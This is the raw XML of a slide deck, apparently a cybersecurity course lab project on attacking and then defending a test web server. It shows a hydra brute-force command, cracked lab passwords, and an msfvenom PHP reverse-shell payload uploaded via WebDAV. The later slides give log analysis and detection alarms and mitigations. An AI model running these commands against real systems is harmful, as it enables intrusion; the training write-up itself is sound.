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 Thin"/>
      <p:regular r:id="rId34"/>
      <p:bold r:id="rId35"/>
      <p:italic r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId38"/>
      <p:boldItalic r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium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Roboto Light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2" roundtripDataSignature="AMtx7mj+rE3OkBj2GhcFcP5CEN6Kojke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7C1110-5C07-4AEE-97EE-63EA7502C6FF}">
  <a:tblStyle styleId="{997C1110-5C07-4AEE-97EE-63EA7502C6F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regular.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium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obotoMedium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Roboto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Thin-bold.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-regular.fntdata"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-boldItalic.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack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7" name="Google Shape;1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6" name="Google Shape;11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9" name="Google Shape;118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c84b2c49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3" name="Google Shape;1203;gc84b2c49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c84b2c49d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0" name="Google Shape;1210;gc84b2c49d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7" name="Google Shape;12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4" name="Google Shape;12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1" name="Google Shape;12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8" name="Google Shape;1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4" name="Google Shape;125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0" name="Google Shape;12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8" name="Google Shape;12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2" name="Google Shape;11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3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7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4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4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4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4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4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4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4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4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4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4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4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3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4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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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52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5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5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52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2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5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5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5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5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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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4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4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9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8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8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6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6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6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6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6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6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6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6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6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0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3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6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8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8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9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9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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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4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1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31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1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31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3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3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Patricia Bottari, March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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639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http cont.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724274" y="1480575"/>
            <a:ext cx="3823159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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724274" y="1480624"/>
            <a:ext cx="3733425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Executed hydra to conduct brute force attack  using the rockyou.txt file to get Ashton’s password.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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hydra –l ashton –P /root/Downloads/rockyou.txt -s 80 –f –vV 192.168.1.105 http-get /company_folders/secret_folder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ashton..leopoldo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crashstation.net to un-hash Ryan’s password. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p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Result: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linux4u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5" name="Google Shape;1125;p10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4807725" y="851714"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1126" name="Google Shape;1126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8" name="Google Shape;1128;p10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5074819" y="1444386"/>
            <a:ext cx="3823158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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5074819" y="1444386"/>
            <a:ext cx="3823158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After login into the server with Ashton’s password, attacker found instructions to connect to the webdav server.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Login to the webdavserver was done using Ryan’s password unhashed with crashstation.net.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-952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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639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http cont.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;p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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1136" name="Google Shape;1136;p11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="319068" y="802664"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1137" name="Google Shape;1137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9" name="Google Shape;1139;p11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="509980" y="1471536"/>
            <a:ext cx="84270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0" name="Google Shape;114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3112" y="983281"/>
            <a:ext cx="2602276" cy="147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11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1222" l="0" r="12786" t="87455"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="716259" y="1689375"/>
            <a:ext cx="5184029" cy="53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11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="25379" l="0" r="11061" t="12328"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="788665" y="2697319"/>
            <a:ext cx="4238835" cy="1300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11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="8205" l="0" r="32991" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5404580" y="2591077"/>
            <a:ext cx="1930630" cy="193947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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716259" y="1370704"/>
            <a:ext cx="66236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Hydra</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688917" y="2368673"/>
            <a:ext cx="18069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Webdav Instructions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146" name="Google Shape;1146;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7712290" y="2478033"/>
            <a:ext cx="11801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Crackstation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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7381323" y="4185995"/>
            <a:ext cx="14494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Webdav access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148" name="Google Shape;1148;p11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6675863" y="3114907"/>
            <a:ext cx="379142" cy="453483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262626">
              <a:alpha val="8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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639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Webdav</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1154" name="Google Shape;1154;p12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724273" y="1480575"/>
            <a:ext cx="4390419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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724274" y="1480624"/>
            <a:ext cx="4501931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msfvenom to create reverse shell PHP payload.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="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msfvenom –p php/meterpreter/reverse_tcp LHOST=19.168.1.90 LPOST=4443 –f raw –o shell.php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msfconsole to establish the remote listener.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-952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Executed reverse shell backdoor on the victim’s machine.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6" name="Google Shape;1156;p1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7" name="Google Shape;1157;p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8" name="Google Shape;1158;p1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9" name="Google Shape;1159;p12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5262144" y="859463"/>
            <a:ext cx="533372" cy="533479"/>
            <a:chOff x="457200" y="1378814"/>
            <a:chExt cx="695400" cy="695449"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1160" name="Google Shape;1160;p12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378814"/>
              <a:ext cx="695400" cy="621301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1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2" name="Google Shape;1162;p12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5516119" y="1480575"/>
            <a:ext cx="31137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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5516137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Uploaded the shell.php file in the webdav server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-952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Successfully connected to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web server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server and found the flag.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659" y="1417495"/>
            <a:ext cx="8688682" cy="3423861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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639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Webdav cont.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1170" name="Google Shape;1170;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="283408" y="802664"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1171" name="Google Shape;1171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2" name="Google Shape;1172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3" name="Google Shape;1173;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="9228" l="0" r="35741" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="682705" y="2224188"/>
            <a:ext cx="2081156" cy="215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3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7966" l="0" r="11678" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1727821" y="1148924"/>
            <a:ext cx="5249941" cy="57230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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1723283" y="821709"/>
            <a:ext cx="10102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msfvenom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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590725" y="1872700"/>
            <a:ext cx="259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Shell.php on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>W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ebdav server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1177" name="Google Shape;1177;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="25296" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3182325" y="2180481"/>
            <a:ext cx="3904132" cy="17259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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3139525" y="1884250"/>
            <a:ext cx="406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Connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Established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Flag</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1179" name="Google Shape;117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22553" y="2746533"/>
            <a:ext cx="2955791" cy="2094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6" name="Google Shape;1186;p1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92" name="Google Shape;1192;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346125" y="3586525"/>
            <a:ext cx="85389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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>he port scan </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>occurred</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t> on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> March 13, 2021 at 15:05.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1,897,968 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>packets were sent from which IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>192.168.1.90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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>arge amount of port requests made at a single timestamp </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>indicated that this was a port scan. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="42174" l="0" r="0" t="15524"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="643888" y="925375"/>
            <a:ext cx="7629832" cy="24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9" name="Google Shape;1199;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657400" y="3798850"/>
            <a:ext cx="85605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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>he request for the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t> directory occured at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>16:00.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163,789 requests made for the secret folder. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1200" name="Google Shape;1200;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="27368" l="0" r="0" t="16627"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308550" y="1042574"/>
            <a:ext cx="5943600" cy="25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c84b2c49d0_0_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6" name="Google Shape;1206;gc84b2c49d0_0_5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447375" y="3706750"/>
            <a:ext cx="85605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The file requested </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>was the “connect_to_corp_server”.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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> file contained instruction on how to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> to webdav server and Ryan’s hashed password which was cracked using crackstation.net.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1207" name="Google Shape;1207;gc84b2c49d0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138" y="864025"/>
            <a:ext cx="7053726" cy="28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c84b2c49d0_0_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3" name="Google Shape;1213;gc84b2c49d0_0_16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="423950" y="4171750"/>
            <a:ext cx="9087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There were </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>163,804</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>  requests were made by Hydra in the attack.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1214" name="Google Shape;1214;gc84b2c49d0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75" y="829025"/>
            <a:ext cx="6535400" cy="32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0" name="Google Shape;1220;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501775" y="3817625"/>
            <a:ext cx="9087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There were </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>163,742 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>requests made by Hydra before the attacker discovered Aston’s password. </a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1221" name="Google Shape;1221;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="12957" l="0" r="0" t="13922"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123775" y="993700"/>
            <a:ext cx="6587424" cy="272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7" name="Google Shape;1227;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="501750" y="3759275"/>
            <a:ext cx="9087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There were </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>127 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>requests were made to webdav directory.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> 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/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t> files requested </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>were </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> the shell.php and passwd.dav.</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1228" name="Google Shape;12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825" y="973263"/>
            <a:ext cx="504825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5" name="Google Shape;1235;p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41" name="Google Shape;1241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2" name="Google Shape;1242;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1552925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Kind of a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>larm that can be set to detect future port scans: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An a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>lert that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>indicates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>when a large amount of traffic occurs in a short period of time from the same IP and targeting multiple ports or requesting ping.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Proposed t</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>hreshold to activate this alarm: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10 ports/minute or 100 consecutive ping requests.</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466800" y="1512725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C</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>onfigurations that can be set on the host to mitigate port scans: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Close ports not being used.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Install firewall. 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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>lock ping requests.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 rich rule to the firewall.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Configure a web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> to block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> requests.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Perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> port scan to determine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>ports are open. 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49" name="Google Shape;1249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0" name="Google Shape;1250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Kind of a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>larm that can be set to detect future unauthorized access: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An</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> alert that indicates when a hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> is requested by a non whitelisted IP or an external IP.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Proposed threshold set to activate this alarm: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1251" name="Google Shape;1251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C</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>onfigurations that can be set on the host to block unwanted access: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Remove all classified data from the website.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white and blacklisting to manage IPs. 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57" name="Google Shape;1257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8" name="Google Shape;1258;p2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Kind of a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>larm that can be set to detect future brute force attacks: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alert for 401 code responses from any servers.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alert rule to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>detect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> when hydra is being used.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Proposed</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t> t</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>hreshold set to activate this alarm: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>&gt;10 fails within 1 min</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1259" name="Google Shape;1259;p2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C</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>onfigurations that can be set on the host to block brute force attacks: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>trong password policy and the use of two factor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>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 failed login attempts to 3.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of Captcha to ensure the user is human.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Limit number of logins from a single IP address.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65" name="Google Shape;1265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66" name="Google Shape;1266;p2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Kind of a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>larm that can be set to detect future access to this directory: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alert that indicates when requests are made from port 4444.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An alert that indicates when a  PHP file is uploaded using the Webdav protocol.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 Proposed t</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>hreshold would you set to activate this alarm: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1267" name="Google Shape;1267;p2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C</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
              <a:t>onfigurations that can be set on the host to control access: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Remove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t> instructions for accessing the server from the web server.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sure software patches are up-to-date.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Disable WebDAV or make sure it’s properly configured.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73" name="Google Shape;1273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74" name="Google Shape;1274;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1602450"/>
            <a:ext cx="45843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K</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400"/>
